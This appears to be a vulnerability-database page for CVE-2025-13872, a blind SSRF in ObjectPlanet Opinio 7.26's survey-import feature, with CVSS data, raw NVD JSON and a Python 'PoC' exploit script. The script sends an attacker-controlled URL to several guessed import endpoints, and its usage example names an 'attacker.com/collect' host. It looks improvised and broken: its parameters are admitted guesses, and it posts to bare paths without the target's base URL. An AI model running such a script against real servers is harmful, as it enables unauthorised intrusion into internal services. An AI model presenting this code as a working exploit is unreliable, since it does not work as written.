Security Vulnerability Report
中文
CVE-2025-13872 CVSS 9.1 CRITICAL

CVE-2025-13872

Published: 2025-12-02 10:16:02
Last Modified: 2025-12-04 17:52:30
Source: 64c5ae8f-7972-4697-86a0-7ada793ac795

Description

Blind Server-Side Request Forgery (SSRF) in the survey-import feature of ObjectPlanet Opinio 7.26 rev12562 on Web-based platforms allows an attacker to force the server to perform HTTP GET requests via crafted import requests to an arbitrary destination.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:objectplanet:opinio:7.26:*:*:*:*:*:*:* - VULNERABLE
ObjectPlanet Opinio 7.26 rev12562 及更早版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-13872 PoC - Blind SSRF in ObjectPlanet Opinio 7.26 # Target: ObjectPlanet Opinio survey-import feature def exploit_ssrf(target_url, attackercontrolled_url): """ Exploit Blind SSRF vulnerability in survey-import feature target_url: Base URL of vulnerable Opinio installation attackercontrolled_url: URL to be requested by server (e.g., internal service) """ # Construct the malicious import request endpoint = f"{target_url.rstrip('/')}/surveyimport" # Common Opinio import endpoints endpoints_to_try = [ "/surveyimport", "/import/survey", "/admin/surveyimport", "/surveys/import" ] headers = { "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (compatible; SSRF-Test-Bot)" } # The payload exploits the import feature to trigger SSRF # Adjust parameters based on actual application behavior payload = { "importSource": attackercontrolled_url, "importType": "survey", "action": "import" } for endpoint in endpoints_to_try: try: print(f"[*] Trying endpoint: {endpoint}") response = requests.post( endpoint, data=payload, headers=headers, timeout=10, verify=False ) print(f"[+] Request sent to {attackercontrolled_url} via {endpoint}") print(f" Response status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error with {endpoint}: {str(e)}") return True if __name__ == "__main__": if len(sys.argv) < 3: print("Usage: python cve-2025-13872-poc.py <target_url> <attacker_url>") print("Example: python cve-2025-13872-poc.py http://vulnerable-server.com http://attacker.com/collect") sys.exit(1) target = sys.argv[1] attacker_url = sys.argv[2] print(f"[*] CVE-2025-13872 - Blind SSRF in ObjectPlanet Opinio 7.26") print(f"[*] Target: {target}") print(f"[*] Attacker-controlled URL: {attacker_url}") exploit_ssrf(target, attacker_url)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13872", "sourceIdentifier": "64c5ae8f-7972-4697-86a0-7ada793ac795", "published": "2025-12-02T10:16:01.877", "lastModified": "2025-12-04T17:52:30.360", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Blind Server-Side Request Forgery (SSRF) in the survey-import feature of \n\n ObjectPlanet Opinio 7.26 rev12562 on \n\nWeb-based platforms allows an attacker to force the server to perform HTTP GET requests via crafted import requests \n\n to an arbitrary destination."}], "metrics": {"cvssMetricV40": [{"source": "64c5ae8f-7972-4697-86a0-7ada793ac795", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:P/PR:H/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "64c5ae8f-7972-4697-86a0-7ada793ac795", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:objectplanet:opinio:7.26:*:*:*:*:*:*:*", "matchCriteriaId": "6684DC3A-4DF1-4417-913C-EE8E169B75B5"}]}]}], "references": [{"url": "https://www.objectplanet.com/opinio/changelog.html", "source": "64c5ae8f-7972-4697-86a0-7ada793ac795", "tags": ["Release Notes"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.